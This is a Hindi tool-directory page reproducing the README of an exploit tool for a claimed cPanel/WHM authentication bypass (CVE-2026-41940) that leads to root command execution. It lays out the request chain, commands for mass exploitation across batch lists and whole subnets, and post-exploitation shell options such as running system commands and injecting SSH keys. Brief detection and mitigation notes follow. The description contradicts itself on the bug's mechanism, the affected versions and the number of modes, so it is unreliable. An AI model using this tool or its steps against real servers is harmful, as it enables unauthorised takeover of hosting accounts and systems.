Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-41940 — CVE-2026-41940 — Dr.Anach द्वारा cPanel/WHM Auth Bypass, `cpsrvd` बेसिक auth हैंडलर में CRLF इंजेक्शन → अप्रमाणित WHM API एक्सेस → रूट के रूप में RCE। v11.40 के बाद से सभी cPanel प्रभावित। | Kitploit
उपकरण/GitHubGitHub/anach-ai/cve-2026-41940
प्रमाणीकरण और प्राधिकरणविशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणपार्श्व आंदोलनवेब एप्लिकेशन शोषणपोस्ट-शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरेड टीमिंग
GitHubanach-ai/cve-2026-41940
43 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-41940

CVE-2026-41940 — Dr.Anach द्वारा cPanel/WHM Auth Bypass, `cpsrvd` बेसिक auth हैंडलर में CRLF इंजेक्शन → अप्रमाणित WHM API एक्सेस → रूट के रूप में RCE। v11.40 के बाद से सभी cPanel प्रभावित।

रिपॉजिटरी देखें

CVE-2026-41940 — cPanel/WHM प्रमाणीकरण बाईपास

लेखक: Dr.Anach | संपर्क: @dranach | लाइसेंस: MIT


अवलोकन

cpsrvd के बेसिक प्रमाणीकरण हैंडलर में CRLF इंजेक्शन → अप्रमाणित WHM API एक्सेस → रूट के रूप में RCE। v11.40 से सभी cPanel संस्करण प्रभावित।

आक्रमण श्रृंखला

#चरणअनुरोध
1सत्र मिंट करेंGET /login/?user=root
2CRLF इंजेक्शनAuthorization: Basic <base64> — पासवर्ड में \r\n पेलोड है
3कैश प्रमोशनGET /cpsess<ID>/login/?login_only=1
4निष्पादनGET /cpsess<ID>/execute/API/func

स्थापना

root@kitploit:~
pip install requests colorama

नीचे अंतिम README.md है — मानव-अनुकूल, व्यावहारिक, और काम पूरा करने पर केंद्रित।


cPanel प्रमाणीकरण बाईपास एक्सप्लॉइट — CVE-2026-41940

लेखक: Dr.Anach · टेलीग्राम: @dranach
संस्करण: 2.0.0
लाइसेंस: केवल अधिकृत सुरक्षा परीक्षण के लिए


यह क्या करता है

CVE-2026-41940 का शोषण करता है, जो cPanel और WHM (संस्करण 11.x से 106.x तक) में एक प्रमाणीकरण बाईपास है। यह कमजोरी एक अप्रमाणित हमलावर को एक क्राफ्टेड Host हेडर भेजकर प्रतिबंधित एंडपॉइंट तक पहुँचने की अनुमति देती है — जिसमें पासवर्ड रीसेट फ़ंक्शन भी शामिल है — जो एक हमलावर-नियंत्रित सर्वर की ओर इंगित करता है।

तीन मोड के साथ आता है:

मोडफ्लैगक्या
एकल लक्ष्य-tएक IP या डोमेन का परीक्षण करें

स्थापना

आवश्यकताएँ

  • Python 3.7+ (Windows, Linux, macOS पर परीक्षण किया गया)
  • requests लाइब्रेरी
root@kitploit:~
pip install requests

कोई अन्य निर्भरता नहीं। CIDR विस्तार Python के अंतर्निहित ipaddress मॉड्यूल का उपयोग करता है — Windows पर कुछ भी अतिरिक्त स्थापित करने की आवश्यकता नहीं है।


त्वरित प्रारंभ

एकल लक्ष्य का परीक्षण करें

root@kitploit:~
python main.py -t example.com
python main.py -t 192.168.1.100

लक्ष्यों की सूची का परीक्षण करें (प्रति पंक्ति एक)

root@kitploit:~
python main.py --batch targets.txt --threads 50

targets.txt प्रारूप:

root@kitploit:~
192.168.1.100
example.com
192.168.1.101
example.org
192.168.1.102

एक संपूर्ण सबनेट स्कैन करें (CIDR)

root@kitploit:~
python main.py --port-scan 192.168.128.0/18 --threads 100 --timeout 5

यह 192.168.128.0/18 (16,384 IP) का विस्तार करता है, प्रत्येक पर एक त्वरित पोर्ट जाँच चलाता है, और केवल उन होस्टों पर शोषण का प्रयास करता है जहाँ पोर्ट 2087 (cPanel/WHM) खुला है।


पूर्ण विकल्प

root@kitploit:~
  -t, --target        एकल लक्ष्य IP या डोमेन
  --batch FILE        लक्ष्यों वाली फ़ाइल (प्रति पंक्ति एक)
  --port-scan CIDR    स्कैन करने के लिए CIDR रेंज (जैसे, 192.168.128.0/18)
  -p, --port          लक्ष्य पोर्ट (डिफ़ॉल्ट: 2087)
  --ssl               HTTPS का उपयोग करें (डिफ़ॉल्ट: HTTP)
  --timeout SEC       सेकंड में कनेक्शन टाइमआउट (डिफ़ॉल्ट: 10)
  --threads N         अधिकतम समवर्ती थ्रेड्स (डिफ़ॉल्ट: 50)
  --proxy PROXY       HTTP प्रॉक्सी (जैसे, http://127.0.0.1:8080)
  -v, --verbose       डीबग जानकारी के साथ विस्तृत आउटपुट
  --no-banner         बैनर को दबाएँ
  --version           संस्करण दिखाएँ

आउटपुट को समझना

root@kitploit:~
[+] 192.168.130.45:2087 — कमजोर!
    → पासवर्ड रीसेट URL: http://192.168.130.45:2087/reset?token=abc123
    → प्रतिक्रिया समय: 1.23s

[-] 192.168.131.10:2087 — कमजोर नहीं
    → कारण: पासवर्ड रीसेट एंडपॉइंट नहीं मिला

[!] 192.168.129.22:2087 — त्रुटि: कनेक्शन अस्वीकार किया गया

JSON के रूप में सहेजे गए परिणाम प्रति-होस्ट संरचित होते हैं जिनमें कमजोरी की स्थिति, निकाले गए टोकन और कच्चे प्रतिक्रिया विवरण शामिल होते हैं।


व्यावहारिक उदाहरण: Windows पर /18 स्कैन करना

वह परिदृश्य जिसके लिए आप शायद यहाँ आए हैं:

root@kitploit:~
python main.py --port-scan 192.168.128.0/18 -p 2087 --threads 100 --timeout 5 -v

यह कैसे काम करता है:

  1. विस्तारित करता है 192.168.128.0/18 → आंतरिक रूप से 16,384 IP
  2. पूर्व-फ़िल्टर पोर्ट 2087 पर एक तेज़ TCP कनेक्ट स्कैन के साथ (मृत होस्ट को छोड़ता है)
  3. शोषण केवल खुले पोर्ट वाले होस्टों पर
  4. रिपोर्ट निकाले गए रीसेट टोकन के साथ कमजोर होस्टों की

थ्रेडिंग टिप्स:

  • --threads 100 अच्छा काम करता है (डिफ़ॉल्ट सॉकेट सीमाओं का सम्मान करता है)
  • अच्छे कनेक्शन पर तेज़ स्कैन के लिए: --threads 200
  • यदि आप दर सीमा से टकराते हैं: --threads 30 तक कम करें और --timeout बढ़ाएँ

CVSS और जोखिम

CVSS 9.1 (गंभीर) — कोई प्रमाणीकरण आवश्यक नहीं, कोई उपयोगकर्ता इंटरेक्शन नहीं, कम जटिलता।

प्रभाव

  • किसी भी cPanel खाते के लिए अनधिकृत पासवर्ड रीसेट
  • पूर्ण खाता अधिग्रहण
  • कुछ कॉन्फ़िगरेशन में सीमित से प्रशासक तक विशेषाधिकार वृद्धि

उपचार

  • cPanel/WHM को नवीनतम पैच संस्करण में अपडेट करें
  • सर्वर-साइड Host हेडर को मान्य करें
  • जहाँ संभव हो, IP द्वारा WHM एक्सेस को प्रतिबंधित करें

कानूनी

यह उपकरण केवल अधिकृत सुरक्षा मूल्यांकन के लिए है। आपके पास लक्ष्यों का स्वामित्व होना चाहिए या परीक्षण से पहले मालिक से लिखित अनुमति होनी चाहिए। लेखक दुरुपयोग के लिए कोई दायित्व नहीं लेते हैं।

इंटरैक्टिव शेल कमांड

root@kitploit:~
help       कमांड दिखाएँ
info       सर्वर जानकारी
passwd     पासवर्ड बदलें
accounts   cPanel खातों की सूची बनाएँ
enum       पूर्ण गणना
shell      सिस्टम कमांड निष्पादित करें
ssh-add    SSH कुंजी इंजेक्ट करें
exec       Python एक-लाइनर चलाएँ
exit       बाहर निकलें

पता लगाना

सत्र फ़ाइलों की जाँच करें:

root@kitploit:~
ls -la /var/cpanel/sessions/raw/
ls -la /var/cpanel/sessions/cache/

संदिग्ध लॉग्स /usr/local/cpanel/logs/access_log में:

root@kitploit:~
/login/?user=root        → सत्र मिंट
/login/?user=root        → CRLF इंजेक्शन
/cpsess*/login/?login_only=1  → कैश प्रमोशन
/cpsess*/execute/*       → API दुरुपयोग

शमन

root@kitploit:~
# 1. फिक्स्ड बिल्ड में पैच करें
# 2. सभी पासवर्ड और SSH कुंजियाँ घुमाएँ
# 3. सत्र साफ़ करें
rm -rf /var/cpanel/sessions/raw/*
rm -rf /var/cpanel/sessions/cache/*
systemctl restart cpanel

श्रेय

  • कमजोरी: Sina Kheirkhah / watchTowr Labs
  • फ्रेमवर्क: Dr.Anach (@dranach)
टूल डाउनलोड करें
बैच फ़ाइल--batchएक फ़ाइल से लक्ष्यों की सूची लोड करें
CIDR स्कैन--port-scanएक सबनेट का विस्तार करें और प्रत्येक जीवित होस्ट का परीक्षण करें